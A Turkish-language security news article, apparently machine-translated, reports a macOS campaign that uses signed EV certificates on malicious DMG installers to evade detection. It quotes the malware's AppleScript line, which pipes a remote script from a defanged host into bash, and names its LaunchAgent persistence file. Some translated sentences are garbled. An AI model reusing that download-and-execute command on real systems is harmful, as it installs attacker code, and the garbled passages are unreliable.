Son haftalarda güvenlik analistleri, kötü niyetli disk görüntülerini (DMG’ler) imzalamak için meşru bir şekilde yayınlanmış genişletilmiş doğrulama (EV) sertifikalarından yararlanan yeni bir macOS saldırıları dalgası gözlemlediler.
Bu teknik, kötü amaçlı yazılım yazarlarının Virustotal ve yerleşik MACOS güvenlik kontrolleri tarafından algılamadan kaçınmasına olanak tanır.
Kampanya ilk olarak, her biri geçerli bir geliştirici kimliği uygulama imzası taşıyan tehdit istihbarat beslemelerinde birden fazla örnek ortaya çıktığında ortaya çıktı.
Saldırganlar, aksi takdirde kötü niyetli yüklere meşruiyet havası vermek için EV sertifikalarının yüksek maliyetinden ve katı denetlenmesinden yararlanıyor.
İlk enfeksiyonlar, meşru uygulamalar olarak maskelenen imzalı DMG yükleyicilerini barındıran tehlikeye atılan web siteleri ile kimlik avı lures yoluyla teslim ediliyor gibi görünmektedir.
Kim ne dedi? Bir araştırmacı olan (@G0NJXA), EV sertifikalarının kötüye kullanılmasının Windows kötü amaçlı yazılımlarla sınırlı olmadığını belirtti – MacOS tehditlerinde de giderek daha fazla mevcut.
Geliştirici kimliği “Thomas Boulay Duval (J97GLQ5KW9)” altında yayınlanan virustotal üzerinde tamamen tespit edilemeyen yeni bir imzalı DMG belirledi.
Örnek (SHA256: A031BA8111DED0C11ACFEDEA9AB83B4BE8274584da71BCC8FF72E2D51957D7), imzalayıcı adını taklit eden bir demet tanımlayıcısı görüntüler (örneğin, “Thomas.Parfums”), yasal yazılım dağıtımlarına, yasal yazılımda kötü bir girişimde bulunur.
Bir kez bildirildikten sonra, bu sertifikalar iptal edilir, ancak erken kampanya aşamalarında önemli bir gizlilik sağlamadan önce değil.
Apple EV sertifikalarını elde etmenin yüksek finansal ve usul önündeki engellere rağmen, tehdit aktörleri, iptalin ilk uzlaşmayı önlemek için çok geç olabileceğini bilerek, onlara yatırım yapmaya istekli görünüyorlar.
Bu, büyüyen bir eğilimin altını çiziyor: Rakipler, yerleşik güven zincirlerinden yararlanarak meşruiyet için işlem hızı.
Enfeksiyon mekanizması
Birincil enfeksiyon mekanizması, monte edildiğinde gömülü bir Applescript başlatıcısı yürüten imzalı bir DMG ile başlar.
DMG içindeki Mach-O ikili incelemesinin incelenmesi, uzak bir komut dosyası ana bilgisayarına sert kodlanmış referanslar ortaya çıkar:-
#!/usr/bin/osascript
do shell script "curl -sL https://franceparfumes[.]org/parfume/install.sh | bash"Yürütme üzerine, komut dosyası bir Launchagent Pist yazarak kalıcılık oluşturan bir ARM64 derlenmiş yük yükü indirir ve yürütür. ~/Library/LaunchAgents/com.thomas.parfums.agent.plist ve girişte kendini yeniden başlatır.
Bu yöntem, geçerli EV imzasına dayanarak bekçi kontrollerini atlar ve MRT taramalarının tetiklenmesini önler, bu da tamamen tespit edilemeyen bir kurulum akışı ile sonuçlanır.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
